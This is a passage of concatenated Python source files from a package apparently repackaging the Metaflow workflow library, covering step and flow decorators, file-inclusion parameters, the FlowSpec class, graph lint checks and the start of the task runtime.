def make_decorator_spec(self):
attrs = {k: v for k, v in self.attributes.items() if v is not None}
if attrs:
attrstr = ','.join('%s=%s' % x for x in attrs.items())
return '%s:%s' % (self.name, attrstr)
else:
return self.name
def __str__(self):
mode = 'decorated' if self.statically_defined else 'cli'
attrs = ' '.join('%s=%s' % x for x in self.attributes.items())
if attrs:
attrs = ' ' + attrs
fmt = '%s<%s%s>' % (self.name, mode, attrs)
return fmt
class FlowDecorator(Decorator):
def flow_init(self, flow, graph, environment, datastore, logger):
"""
Called when all decorators have been created for this flow.
"""
pass
class StepDecorator(Decorator):
"""
Base class for all step decorators.
Example:
@my_decorator
@step
def a(self):
pass
@my_decorator
@step
def b(self):
pass
To make the above work, define a subclass
class MyDecorator(StepDecorator):
name = "my_decorator"
and include it in plugins.STEP_DECORATORS. Now both a() and b()
get an instance of MyDecorator, so you can keep step-specific
state easily.
TODO (savin): Initialize the decorators with flow, graph,
step.__name__ etc., so that we don't have to
pass them around with every lifecycle call.
"""
def step_init(self, flow, graph, step_name, decorators, environment, datastore, logger):
"""
Called when all decorators have been created for this step
"""
pass
def package_init(self, flow, step_name, environment):
"""
Called to determine package components
"""
pass
def step_task_retry_count(self):
"""
Called to determine the number of times this task should be retried.
Returns a tuple of (user_code_retries, error_retries). Error retries
are attempts to run the process after the user code has failed all
its retries.
"""
return 0, 0
def runtime_init(self, flow, graph, package, run_id):
"""
Top-level initialization before anything gets run in the runtime
context.
"""
pass
def runtime_task_created(self,
datastore,
task_id,
split_index,
input_paths,
is_cloned):
"""
Called when the runtime has created a task related to this step.
"""
pass
def runtime_finished(self, exception):
"""
Called when the runtime created task finishes or encounters an interrupt/exception.
"""
pass
def runtime_step_cli(self, cli_args, retry_count, max_user_code_retries):
"""
Access the command line for a step execution in the runtime context.
"""
pass
def task_pre_step(self,
step_name,
datastore,
metadata,
run_id,
task_id,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run before the step function in the task context.
"""
pass
def task_decorate(self,
step_func,
flow,
graph,
retry_count,
max_user_code_retries):
return step_func
def task_post_step(self,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run after the step function has finished successfully in the task
context.
"""
pass
def task_exception(self,
exception,
step_name,
flow,
graph,
retry_count,
max_user_code_retries):
"""
Run if the step function raised an exception in the task context.
If this method returns True, it is assumed that the exception has
been taken care of and the flow may continue.
"""
pass
def task_finished(self,
step_name,
flow,
graph,
is_task_ok,
retry_count,
max_user_code_retries):
"""
Run after the task context has been finalized.
is_task_ok is set to False if the user code raised an exception that
was not handled by any decorator.
Note that you can't create or modify data artifacts in this method
since the task has been finalized by the time this method
is called. Also note that the task may fail after this method has been
called, so this method may get called multiple times for a task over
multiple attempts, similar to all task_ methods.
"""
pass
def _base_flow_decorator(decofunc, *args, **kwargs):
"""
Decorator prototype for all flow (class) decorators. This function gets
specialized and imported for all decorators types by
_import_plugin_decorators().
"""
if args:
# No keyword arguments specified for the decorator, e.g. @foobar.
# The first argument is the class to be decorated.
cls = args[0]
if isinstance(cls, type) and issubclass(cls, FlowSpec):
# flow decorators add attributes in the class dictionary,
# _flow_decorators.
if decofunc.name in cls._flow_decorators:
raise DuplicateFlowDecoratorException(decofunc.name)
else:
cls._flow_decorators[decofunc.name] = decofunc(attributes=kwargs,
statically_defined=True)
else:
raise BadFlowDecoratorException(decofunc.name)
return cls
else:
# Keyword arguments specified, e.g. @foobar(a=1, b=2).
# Return a decorator function that will get the actual
# function to be decorated as the first argument.
def wrap(f):
return _base_flow_decorator(decofunc, f, **kwargs)
return wrap
def _base_step_decorator(decotype, *args, **kwargs):
"""
Decorator prototype for all step decorators. This function gets specialized
and imported for all decorators types by _import_plugin_decorators().
"""
if args:
# No keyword arguments specified for the decorator, e.g. @foobar.
# The first argument is the function to be decorated.
func = args[0]
if not hasattr(func, 'is_step'):
raise BadStepDecoratorException(decotype.name, func)
# Only the first decorator applies
if decotype.name in [deco.name for deco in func.decorators]:
raise DuplicateStepDecoratorException(decotype.name, func)
else:
func.decorators.append(decotype(attributes=kwargs,
statically_defined=True))
return func
else:
# Keyword arguments specified, e.g. @foobar(a=1, b=2).
# Return a decorator function that will get the actual
# function to be decorated as the first argument.
def wrap(f):
return _base_step_decorator(decotype, f, **kwargs)
return wrap
def _attach_decorators(flow, decospecs):
"""
Attach decorators to all steps during runtime. This has the same
effect as if you defined the decorators statically in the source for
every step. Used by --with command line parameter.
"""
from .plugins import STEP_DECORATORS
decos = {decotype.name: decotype for decotype in STEP_DECORATORS}
for decospec in decospecs:
deconame = decospec.split(':')[0]
if deconame not in decos:
raise UnknownStepDecoratorException(deconame)
# Attach the decorator to all steps that don't have this decorator
# already. This means that statically defined decorators are always
# preferred over runtime decorators.
#
# Note that each step gets its own instance of the decorator class,
# so decorator can maintain step-specific state.
for step in flow:
if deconame not in [deco.name for deco in step.decorators]:
deco = decos[deconame]._parse_decorator_spec(decospec)
step.decorators.append(deco)
def _init_decorators(flow, graph, environment, datastore, logger):
for deco in flow._flow_decorators.values():
deco.flow_init(flow, graph, environment, datastore, logger)
for step in flow:
for deco in step.decorators:
deco.step_init(flow, graph, step.__name__,
step.decorators, environment, datastore, logger)
def step(f):
"""
The step decorator. Makes a method a step in the workflow.
"""
f.is_step = True
f.decorators = []
try:
# python 3
f.name = f.__name__
except:
# python 2
f.name = f.__func__.func_name
return f
def _import_plugin_decorators(globals_dict):
"""
Auto-generate a decorator function for every decorator
defined in plugins.STEP_DECORATORS and plugins.FLOW_DECORATORS.
"""
from .plugins import STEP_DECORATORS, FLOW_DECORATORS
# Q: Why not use StepDecorators directly as decorators?
# A: Getting an object behave as a decorator that can work
# both with and without arguments is surprisingly hard.
# It is easier to make plain function decorators work in
# the dual mode - see _base_step_decorator above.
for decotype in STEP_DECORATORS:
globals_dict[decotype.name] = partial(_base_step_decorator, decotype)
# add flow-level decorators
for decotype in FLOW_DECORATORS:
globals_dict[decotype.name] = partial(_base_flow_decorator, decotype) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/decorators.py | decorators.py |
import io
import os
import click
from metaflow.exception import MetaflowException
from metaflow.parameters import Parameter
class InternalFile():
def __init__(self, logger, is_text, encoding, path):
self._logger = logger
self._is_text = is_text
self._encoding = encoding
self._path = path
self._size = os.path.getsize(self._path)
def __call__(self):
unit = ['B', 'KB', 'MB', 'GB', 'TB']
sz = self._size
pos = 0
while pos < len(unit) and sz >= 1024:
sz = sz // 1024
pos += 1
if pos >= 3:
extra = '(this may take a while)'
else:
extra = ''
self._logger(
'Including file %s of size %d%s %s' % (self._path, sz, unit[pos], extra))
if self._is_text:
return io.open(self._path, mode='rt', encoding=self._encoding).read()
try:
return io.open(self._path, mode='rb').read()
except IOError:
# If we get an error here, since we know that the file exists already,
# it means that read failed which happens with Python 2.7 for large files
raise MetaflowException('Cannot read file at %s -- this is likely because it is too '
'large to be properly handled by Python 2.7' % self._path)
def name(self):
return self._path
def size(self):
return self._size
class FilePathClass(click.ParamType):
name = 'FilePath'
def __init__(self, is_text, encoding):
self._is_text = is_text
self._encoding = encoding
def convert(self, value, param, ctx):
try:
with open(value, mode='r') as _:
pass
except OSError:
self.fail("Could not open file '%s'" % value)
return InternalFile(ctx.obj.logger, self._is_text, self._encoding, value)
def __str__(self):
return repr(self)
def __repr__(self):
return 'FilePath'
class IncludeFile(Parameter):
def __init__(
self, name, required=False, is_text=True, encoding=None, help=None, default=None):
super(IncludeFile, self).__init__(
name, required=required, help=help, default=default,
type=FilePathClass(is_text, encoding)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/includefile.py | includefile.py |
from itertools import islice
import os
import sys
import inspect
import traceback
from . import cmd_with_io
from .parameters import Parameter
from .exception import MetaflowException, MetaflowInternalError, MergeArtifactsException
from .graph import FlowGraph
# For Python 3 compatibility
try:
basestring
except NameError:
basestring = str
class InvalidNextException(MetaflowException):
headline = "Invalid self.next() transition detected"
def __init__(self, msg):
# NOTE this assume that InvalidNextException is only raised
# at the top level of next()
_, line_no, _, _ = traceback.extract_stack()[-3]
super(InvalidNextException, self).__init__(msg, line_no)
class FlowSpec(object):
"""
Main class from which all Flows should inherit.
Attributes
----------
script_name
index
input
"""
# Attributes that are not saved in the datastore when checkpointing.
# Name starting with '__', methods, functions and Parameters do not need
# to be listed.
_EPHEMERAL = {'_EPHEMERAL',
'_datastore',
'_cached_input',
'_graph',
'_flow_decorators',
'_steps',
'index',
'input'}
_flow_decorators = {}
def __init__(self, use_cli=True):
"""
Construct a FlowSpec
Parameters
----------
use_cli : bool, optional, default: True
Set to True if the flow is invoked from __main__ or the command line
"""
self.name = self.__class__.__name__
self._datastore = None
self._transition = None
self._cached_input = {}
self._graph = FlowGraph(self.__class__)
self._steps = [getattr(self, node.name) for node in self._graph]
if use_cli:
# we import cli here to make sure custom parameters in
# args.py get fully evaluated before cli.py is imported.
from . import cli
cli.main(self)
@property
def script_name(self):
"""
Returns the name of the script containing the flow
Returns
-------
str
A string containing the name of the script
"""
fname = inspect.getfile(self.__class__)
if fname.endswith('.pyc'):
fname = fname[:-1]
return os.path.basename(fname)
def _get_parameters(self):
for var in dir(self):
if var[0] == '_':
continue
try:
val = getattr(self, var)
except:
continue
if isinstance(val, Parameter):
yield var, val
def _set_datastore(self, datastore):
self._datastore = datastore
def __iter__(self):
"""
Iterate over all steps in the Flow
Returns
-------
Iterator[graph.DAGNode]
Iterator over the steps in the flow
"""
return iter(self._steps)
def __getattr__(self, name):
if self._datastore and name in self._datastore:
# load the attribute from the datastore...
x = self._datastore[name]
# ...and cache it in the object for faster access
setattr(self, name, x)
return x
else:
raise AttributeError("Flow %s has no attribute '%s'" %
(self.name, name))
def cmd(self, cmdline, input={}, output=[]):
return cmd_with_io.cmd(cmdline,
input=input,
output=output)
@property
def index(self):
"""
Index of the task in a foreach step
In a foreach step, multiple instances of this step (tasks) will be executed,
one for each element in the foreach.
This property returns the zero based index of the current task. If this is not
a foreach step, this returns None.
See Also
--------
foreach_stack: A detailed example is given in the documentation of this function
Returns
-------
int
Index of the task in a foreach step
"""
if self._foreach_stack:
return self._foreach_stack[-1].index
@property
def input(self):
"""
Value passed to the task in a foreach step
In a foreach step, multiple instances of this step (tasks) will be executed,
one for each element in the foreach.
This property returns the element passed to the current task. If this is not
a foreach step, this returns None.
See Also
--------
foreach_stack: A detailed example is given in the documentation of this function
Returns
-------
object
Input passed to the task (can be any object)
"""
return self._find_input()
def foreach_stack(self):
"""
Returns the current stack of foreach steps for the current step
This effectively corresponds to the indexes and values at the various levels of nesting.
For example, considering the following code:
```
@step
def root(self):
self.split_1 = ['a', 'b', 'c']
self.next(self.nest_1, foreach='split_1')
@step
def nest_1(self):
self.split_2 = ['d', 'e', 'f', 'g']
self.next(self.nest_2, foreach='split_2'):
@step
def nest_2(self):
foo = self.foreach_stack()
```
foo will take the following values in the various tasks for nest_2:
[(0, 3, 'a'), (0, 4, 'd')]
[(0, 3, 'a'), (1, 4, 'e')]
...
[(0, 3, 'a'), (3, 4, 'g')]
[(1, 3, 'b'), (0, 4, 'd')]
...
where each tuple corresponds to:
- the index of the task for that level of the loop
- the number of splits for that level of the loop
- the value for that level of the loop
Note that the last tuple returned in a task corresponds to:
- first element: value returned by self.index
- third element: value returned by self.input
Returns
-------
List[Tuple[int, int, object]]
An array describing the current stack of foreach steps
"""
return [(frame.index, frame.num_splits, self._find_input(stack_index=i))
for i, frame in enumerate(self._foreach_stack)]
def _find_input(self, stack_index=None):
if stack_index is None:
stack_index = len(self._foreach_stack) - 1
if stack_index in self._cached_input:
return self._cached_input[stack_index]
elif self._foreach_stack:
# NOTE this is obviously an O(n) operation which also requires
# downloading the whole input data object in order to find the
# right split. One can override this method with a more efficient
# input data handler if this is a problem.
frame = self._foreach_stack[stack_index]
try:
var = getattr(self, frame.var)
except AttributeError:
# this is where AttributeError happens:
# [ foreach x ]
# [ foreach y ]
# [ inner ]
# [ join y ] <- call self.foreach_stack here,
# self.x is not available
self._cached_input[stack_index] = None
else:
try:
self._cached_input[stack_index] = var[frame.index]
except TypeError:
# __getitem__ not supported, fall back to an iterator
self._cached_input[stack_index] = next(islice(var,
frame.index,
frame.index + 1))
return self._cached_input[stack_index]
def merge_artifacts(self, inputs, exclude=[]):
"""
Merge the artifacts coming from each merge branch (from inputs)
This function takes all the artifacts coming from the branches of a
join point and assigns them to self in the calling step. Only artifacts
not set in the current step are considered. If, for a given artifact, different
values are present on the incoming edges, an error will be thrown (and the artifacts
that "conflict" will be reported).
As a few examples, in the simple graph: A splitting into B and C and joining in D:
A:
self.x = 5
self.y = 6
B:
self.b_var = 1
self.x = from_b
C:
self.x = from_c
D:
merge_artifacts(inputs)
In D, the following artifacts are set:
- y (value: 6), b_var (value: 1)
- if from_b and from_c are the same, x will be accessible and have value from_b
- if from_b and from_c are different, an error will be thrown. To prevent this error,
you need to manually set self.x in D to a merged value (for example the max) prior to
calling merge_artifacts.
Parameters
----------
inputs : List[Steps]
Incoming steps to the join point
exclude : List[str], optional
Raises
------
MetaflowException
This exception is thrown if this is not called in a join step
MergeArtifactsException
This exception is thrown in case of unresolved conflicts
"""
node = self._graph[self._current_step]
if node.type != 'join':
msg = "merge_artifacts can only be called in a join and step *{step}* "\
"is not a join".format(step=self._current_step)
raise MetaflowException(msg)
to_merge = {}
unresolved = []
for inp in inputs:
# available_vars is the list of variables from inp that should be considered
available_vars = ((var, sha) for var, sha in inp._datastore.items()
if (var not in exclude) and (not hasattr(self, var)))
for var, sha in available_vars:
_, previous_sha = to_merge.setdefault(var, (inp, sha))
if previous_sha != sha:
# We have a conflict here
unresolved.append(var)
if unresolved:
# We have unresolved conflicts so we do not set anything and error out
msg = "Step *{step}* cannot merge the following artifacts due to them "\
"having conflicting values:\n[{artifacts}].\nTo remedy this issue, "\
"be sure to explictly set those artifacts (using "\
"self.<artifact_name> = ...) prior to calling merge_artifacts."\
.format(step=self._current_step, artifacts=', '.join(unresolved))
raise MergeArtifactsException(msg, unresolved)
# If things are resolved, we go and fetch from the datastore and set here
for var, (inp, _) in to_merge.items():
setattr(self, var, getattr(inp, var))
def next(self, *dsts, **kwargs):
"""
Indicates the next step to execute at the end of this step
This statement should appear once and only once in each and every step (except the `end`
step). Furthermore, it should be the last statement in the step.
There are several valid formats to specify the next step:
- Straight-line connection: self.next(self.next_step) where `next_step` is a method in
the current class decorated with the `@step` decorator
- Static fan-out connection: self.next(self.step1, self.step2, ...) where `stepX` are
methods in the current class decorated with the `@step` decorator
- Conditional branch:
self.next(self.if_true, self.if_false, condition='boolean_variable')
In this situation, both `if_true` and `if_false` are methods in the current class
decorated with the `@step` decorator and `boolean_variable` is a variable name
in the current class that evaluates to True or False. The `if_true` step will be
executed if thecondition variable evaluates to True and the `if_false` step will
be executed otherwise
- Foreach branch:
self.next(self.foreach_step, foreach='foreach_iterator')
In this situation, `foreach_step` is a method in the current class decorated with the
`@step` docorator and `foreach_iterator` is a variable name in the current class that
evaluates to an iterator. A task will be launched for each value in the iterator and
each task will execute the code specified by the step `foreach_step`.
Raises
------
InvalidNextException
Raised if the format of the arguments does not match one of the ones given above.
"""
step = self._current_step
foreach = kwargs.pop('foreach', None)
condition = kwargs.pop('condition', None)
if kwargs:
kw = next(iter(kwargs))
msg = "Step *{step}* passes an unknown keyword argument "\
"'{invalid}' to self.next().".format(step=step, invalid=kw)
raise InvalidNextException(msg)
# check: next() is called only once
if self._transition is not None:
msg = "Multiple self.next() calls detected in step *{step}*. "\
"Call self.next() only once.".format(step=step)
raise InvalidNextException(msg)
# check: all destinations are methods of this object
funcs = []
for i, dst in enumerate(dsts):
try:
name = dst.__func__.__name__
except:
msg = "In step *{step}* the {arg}. argument in self.next() is "\
"not a function. Make sure all arguments in self.next() "\
"are methods of the Flow class."\
.format(step=step, arg=i + 1)
raise InvalidNextException(msg)
if not hasattr(self, name):
msg = "Step *{step}* specifies a self.next() transition to an "\
"unknown step, *{name}*.".format(step=step,
name=name)
raise InvalidNextException(msg)
funcs.append(name)
# check: foreach and condition are mutually exclusive
if not (foreach is None or condition is None):
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify either 'foreach' or 'condition', not both."\
.format(step=step)
raise InvalidNextException(msg)
# check: foreach is valid
if foreach:
if not isinstance(foreach, basestring):
msg = "Step *{step}* has an invalid self.next() transition. "\
"The argument to 'foreach' must be a string."\
.format(step=step)
raise InvalidNextException(msg)
if len(dsts) != 1:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify exactly one target for 'foreach'."\
.format(step=step)
raise InvalidNextException(msg)
try:
foreach_iter = getattr(self, foreach)
except:
msg = "Foreach variable *self.{var}* in step *{step}* "\
"does not exist. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
try:
self._foreach_num_splits = sum(1 for _ in foreach_iter)
except TypeError:
msg = "Foreach variable *self.{var}* in step *{step}* "\
"is not iterable. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
if self._foreach_num_splits == 0:
msg = "Foreach iterator over *{var}* in step *{step}* "\
"produced zero splits. Check your variable."\
.format(step=step, var=foreach)
raise InvalidNextException(msg)
self._foreach_var = foreach
# check: condition is valid
if condition:
if not isinstance(condition, basestring):
msg = "Step *{step}* has an invalid self.next() transition. "\
"The argument to 'condition' must be a string."\
.format(step=step)
raise InvalidNextException(msg)
if len(dsts) != 2:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify two targets for 'condition': The first target "\
"is used if the condition evaluates to true, the second "\
"otherwise.".format(step=step)
raise InvalidNextException(msg)
# check: non-keyword transitions are valid
if foreach is None and condition is None:
if len(dsts) < 1:
msg = "Step *{step}* has an invalid self.next() transition. "\
"Specify at least one step function as an argument in "\
"self.next().".format(step=step)
raise InvalidNextException(msg)
self._transition = (funcs, foreach, condition)
def __str__(self):
step_name = getattr(self, '_current_step', None)
if step_name:
index = ','.join(str(idx) for idx, _, _ in self.foreach_stack())
if index:
inp = self.input
if inp is None:
return '<flow %s step %s[%s]>' %\
(self.name, step_name, index)
else:
inp = str(inp)
if len(inp) > 20:
inp = inp[:20] + '...'
return '<flow %s step %s[%s] (input: %s)>' %\
(self.name, step_name, index, inp)
else:
return '<flow %s step %s>' % (self.name, step_name)
else:
return '<flow %s>' % self.name
def __getstate__(self):
raise MetaflowException("Flows can't be serialized. Maybe you tried "
"to assign *self* or one of the *inputs* "
"to an attribute? Instead of serializing the "
"whole flow, you should choose specific "
"attributes, e.g. *input.some_var*, to be "
"stored.") | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/flowspec.py | flowspec.py |
import re
from .exception import MetaflowException
from .util import all_equal
class LintWarn(MetaflowException):
headline="Validity checker found an issue"
class FlowLinter(object):
def __init__(self):
self.require_static_graph = True
self.require_fundamentals = True
self.require_acyclicity = True
self.require_non_nested_foreach = False
self._checks = []
def _decorate(self, setting, f):
f.attrs.append(setting)
return f
def ensure_static_graph(self, f):
return self._decorate('require_static_graph', f)
def ensure_fundamentals(self, f):
return self._decorate('require_fundamentals', f)
def ensure_acyclicity(self, f):
return self._decorate('require_acyclicity', f)
def ensure_non_nested_foreach(self, f):
return self._decorate('require_non_nested_foreach', f)
def check(self, f):
self._checks.append(f)
f.attrs = []
return f
def run_checks(self, graph, **kwargs):
for check in self._checks:
if any(getattr(self, attr) or kwargs.get(attr)
for attr in check.attrs):
check(graph)
linter = FlowLinter()
@linter.ensure_fundamentals
@linter.check
def check_reserved_words(graph):
RESERVED = {'name',
'next',
'input',
'index',
'cmd'}
msg = 'Step name *%s* is a reserved word. Choose another name for the '\
'step.'
for node in graph:
if node.name in RESERVED:
raise LintWarn(msg % node.name)
@linter.ensure_fundamentals
@linter.check
def check_basic_steps(graph):
msg ="Add %s *%s* step in your flow."
for prefix, node in (('a', 'start'), ('an', 'end')):
if node not in graph:
raise LintWarn(msg % (prefix, node))
@linter.ensure_static_graph
@linter.check
def check_that_end_is_end(graph):
msg0="The *end* step should not have a step.next() transition. "\
"Just remove it."
msg1="The *end* step should not be a join step (it gets an extra "\
"argument). Add a join step before it."
node=graph['end']
if node.has_tail_next or node.invalid_tail_next:
raise LintWarn(msg0, node.tail_next_lineno)
if node.num_args > 1:
raise LintWarn(msg1, node.tail_next_lineno)
@linter.ensure_fundamentals
@linter.check
def check_step_names(graph):
msg =\
"Step *{0.name}* has an invalid name. Only lowercase ascii "\
"characters, underscores, and digits are allowed."
for node in graph:
if re.search('[^a-z0-9_]', node.name) or node.name[0] == '_':
raise LintWarn(msg.format(node), node.func_lineno)
@linter.ensure_fundamentals
@linter.check
def check_num_args(graph):
msg0 =\
"Step {0.name} has too many arguments. Normal steps take only "\
"'self' as an argument. Join steps take 'self' and 'inputs'."
msg1 =\
"Step *{0.name}* is both a join step (it takes an extra argument) "\
"and a split step (it transitions to multiple steps). This is not "\
"allowed. Add a new step so that split and join become separate steps."
msg2 = "Step *{0.name}* is missing the 'self' argument."
for node in graph:
if node.num_args > 2:
raise LintWarn(msg0.format(node), node.func_lineno)
elif node.num_args == 2 and node.type != 'join':
raise LintWarn(msg1.format(node), node.func_lineno)
elif node.num_args == 0:
raise LintWarn(msg2.format(node), node.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_static_transitions(graph):
msg =\
"Step *{0.name}* is missing a self.next() transition to "\
"the next step. Add a self.next() as the last line in the "\
"function."
for node in graph:
if node.type != 'end' and not node.has_tail_next:
raise LintWarn(msg.format(node), node.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_valid_transitions(graph):
msg =\
"Step *{0.name}* specifies an invalid self.next() transition. "\
"Make sure the self.next() expression matches with one of the "\
"supported transition types."
for node in graph:
if node.type != 'end' and\
node.has_tail_next and\
node.invalid_tail_next:
raise LintWarn(msg.format(node), node.tail_next_lineno)
@linter.ensure_static_graph
@linter.check
def check_unknown_transitions(graph):
msg =\
"Step *{0.name}* specifies a self.next() transition to "\
"an unknown step, *{step}*."
for node in graph:
unknown = [n for n in node.out_funcs if n not in graph]
if unknown:
raise LintWarn(msg.format(node, step=unknown[0]),
node.tail_next_lineno)
@linter.ensure_acyclicity
@linter.ensure_static_graph
@linter.check
def check_for_acyclicity(graph):
msg = "There is a loop in your flow: *{0}*. Break the loop "\
"by fixing self.next() transitions."
def check_path(node, seen):
for n in node.out_funcs:
if n in seen:
path = '->'.join(seen + [n])
raise LintWarn(msg.format(path),
node.tail_next_lineno)
else:
check_path(graph[n], seen + [n])
for start in graph:
check_path(start, [])
@linter.ensure_static_graph
@linter.check
def check_for_orphans(graph):
msg =\
"Step *{0.name}* is unreachable from the start step. Add "\
"self.next({0.name}) in another step or remove *{0.name}*."
seen = set(['start'])
def traverse(node):
for n in node.out_funcs:
if n not in seen:
seen.add(n)
traverse(graph[n])
traverse(graph['start'])
nodeset = frozenset(n.name for n in graph)
orphans = nodeset - seen
if orphans:
orphan = graph[list(orphans)[0]]
raise LintWarn(msg.format(orphan), orphan.func_lineno)
@linter.ensure_static_graph
@linter.check
def check_split_join_balance(graph):
msg0 = "Step *end* reached before a split started at step(s) *{roots}* "\
"were joined. Add a join step before *end*."
msg1 = "Step *{0.name}* seems like a join step (it takes an extra input "\
"argument) but an incorrect number of steps (*{paths}*) lead to "\
"it. This join was expecting {num_roots} incoming paths, starting "\
"from splitted step(s) *{roots}*."
msg2 = "Step *{0.name}* seems like a join step (it takes an extra input "\
"argument) but it is not preceded by a split. Ensure that there is "\
"a matching split for every join."
msg3 = "Step *{0.name}* joins steps from unrelated splits. Ensure that "\
"there is a matching join for every split."
def traverse(node, split_stack):
if node.type == 'linear':
new_stack = split_stack
elif node.type in ('split-or', 'split-and', 'foreach'):
new_stack = split_stack + [('split', node.out_funcs)]
elif node.type == 'end':
if split_stack:
split_type, split_roots = split_stack.pop()
roots = ', '.join(split_roots)
raise LintWarn(msg0.format(roots=roots))
elif node.type == 'join':
if split_stack:
split_type, split_roots = split_stack[-1]
new_stack = split_stack[:-1]
if len(node.in_funcs) != len(split_roots):
paths = ', '.join(node.in_funcs)
roots = ', '.join(split_roots)
raise LintWarn(msg1.format(node,
paths=paths,
num_roots=len(split_roots),
roots=roots),
node.func_lineno)
else:
raise LintWarn(msg2.format(node), node.func_lineno)
# check that incoming steps come from the same lineage
# (no cross joins)
def parents(n):
if graph[n].type == 'join':
return tuple(graph[n].split_parents[:-1])
else:
return tuple(graph[n].split_parents)
if not all_equal(map(parents, node.in_funcs)):
raise LintWarn(msg3.format(node), node.func_lineno)
for n in node.out_funcs:
traverse(graph[n], new_stack)
traverse(graph['start'], [])
@linter.ensure_static_graph
@linter.check
def check_empty_foreaches(graph):
msg = "Step *{0.name}* is a foreach split that has no children: "\
"it is followed immeditately by a join step, *{join}*. Add "\
"at least one step between the split and the join."
for node in graph:
if node.type == 'foreach':
joins = [n for n in node.out_funcs if graph[n].type == 'join']
if joins:
raise LintWarn(msg.format(node, join=joins[0]))
@linter.ensure_non_nested_foreach
@linter.check
def check_nested_foreach(graph):
msg = "Nested foreaches are not allowed: Step *{0.name}* is a foreach "\
"split that is nested under another foreach split."
for node in graph:
if node.type == 'foreach':
if any(graph[p].type == 'foreach' for p in node.split_parents):
raise LintWarn(msg.format(node)) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/lint.py | lint.py |
from __future__ import print_function
import json
import os
import sys
import fcntl
import time
import select
import subprocess
from functools import partial
from . import get_namespace
from .metaflow_config import MAX_ATTEMPTS
from .exception import MetaflowException,\
MetaflowInternalError,\
METAFLOW_EXIT_DISALLOW_RETRY
from . import procpoll
from .datastore import DataException, MetaflowDatastoreSet
from .metadata import MetaDatum
from .debug import debug
from .util import to_unicode, compress_list
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
import io
BytesIO = io.BytesIO
MAX_WORKERS=16
MAX_NUM_SPLITS=100
MAX_LOG_SIZE=1024*1024
PROGRESS_INTERVAL = 1000 #ms
# The following is a list of the (data) artifacts used by the runtime while
# executing a flow. These are prefetched during the resume operation by
# leveraging the MetaflowDatastoreSet.
PREFETCH_DATA_ARTIFACTS = ['_foreach_stack', '_task_ok', '_transition']
# TODO option: output dot graph periodically about execution
class NativeRuntime(object):
def __init__(self,
flow,
graph,
datastore,
metadata,
environment,
package,
logger,
entrypoint,
event_logger,
monitor,
run_id=None,
clone_run_id=None,
clone_steps=None,
max_workers=MAX_WORKERS,
max_num_splits=MAX_NUM_SPLITS,
max_log_size=MAX_LOG_SIZE):
if run_id is None:
self._run_id = metadata.new_run_id()
else:
self._run_id = run_id
metadata.register_run_id(run_id)
self._flow = flow
self._graph = graph
self._datastore = datastore
self._metadata = metadata
self._environment = environment
self._logger = logger
self._max_workers = max_workers
self._num_active_workers = 0
self._max_num_splits = max_num_splits
self._max_log_size = max_log_size
self._params_task = None
self._entrypoint = entrypoint
self.event_logger = event_logger
self._monitor = monitor
self._clone_run_id = clone_run_id
self._clone_steps = {} if clone_steps is None else clone_steps
self._origin_ds_set = None
if clone_run_id:
# resume logic
# 0. If clone_run_id is specified, attempt to clone all the
# successful tasks from the flow with `clone_run_id`. And run the
# unsuccessful or not-run steps in the regular fashion.
# 1. With _find_origin_task, for every task in the current run, we
# find the equivalent task in `clone_run_id` using
# pathspec_index=run/step:[index] and verify if this task can be
# cloned.
# 2. If yes, we fire off a clone-only task which copies the
# metadata from the `clone_origin` to pathspec=run/step/task to
# mimmick that the resumed run looks like an actual run.
# 3. All steps that couldn't be cloned (either unsuccessful or not
# run) are run as regular tasks.
# Lastly, to improve the performance of the cloning process, we
# leverage the MetaflowDatastoreSet abstraction to prefetch the
# entire DAG of `clone_run_id` and relevant data artifacts
# (see PREFETCH_DATA_ARTIFACTS) so that the entire runtime can
# access the relevant data from cache (instead of going to the datastore
# after the first prefetch).
logger(
'Gathering required information to resume run (this may take a bit of time)...')
self._origin_ds_set = \
MetaflowDatastoreSet(
datastore,
flow.name,
clone_run_id,
metadata=metadata,
event_logger=event_logger,
monitor=monitor,
prefetch_data_artifacts=PREFETCH_DATA_ARTIFACTS)
self._run_queue = []
self._poll = procpoll.make_poll()
self._workers = {} # fd -> subprocess mapping
self._finished = {}
self._is_cloned = {}
for step in flow:
for deco in step.decorators:
deco.runtime_init(flow,
graph,
package,
self._run_id)
def _new_task(self, step, input_paths=None, **kwargs):
if input_paths is None:
may_clone = True
else:
may_clone = all(self._is_cloned[path] for path in input_paths)
if step in self._clone_steps:
may_clone = False
if step == '_parameters':
decos = []
else:
decos = getattr(self._flow, step).decorators
return Task(self._datastore,
self._flow,
step,
self._run_id,
self._metadata,
self._environment,
self._entrypoint,
self.event_logger,
self._monitor,
input_paths=input_paths,
may_clone=may_clone,
clone_run_id=self._clone_run_id,
origin_ds_set=self._origin_ds_set,
decos=decos,
logger=self._logger,
**kwargs)
@property
def run_id(self):
return self._run_id
def persist_parameters(self, task_id=None):
task = self._new_task('_parameters', task_id=task_id)
if not task.is_cloned:
task.persist(self._flow)
self._params_task = task.path
self._is_cloned[task.path] = task.is_cloned
def execute(self):
self._logger('Workflow starting (run-id %s):' % self._run_id,
system_msg=True)
if self._params_task:
self._queue_push('start', {'input_paths': [self._params_task]})
else:
self._queue_push('start', {})
progress_tstamp = time.time()
try:
# main scheduling loop
exception = None
while self._run_queue or\
self._num_active_workers > 0:
# 1. are any of the current workers finished?
finished_tasks = list(self._poll_workers())
# 2. push new tasks triggered by the finished tasks to the queue
self._queue_tasks(finished_tasks)
# 3. if there are available worker slots, pop and start tasks
# from the queue.
self._launch_workers()
if time.time() - progress_tstamp > PROGRESS_INTERVAL:
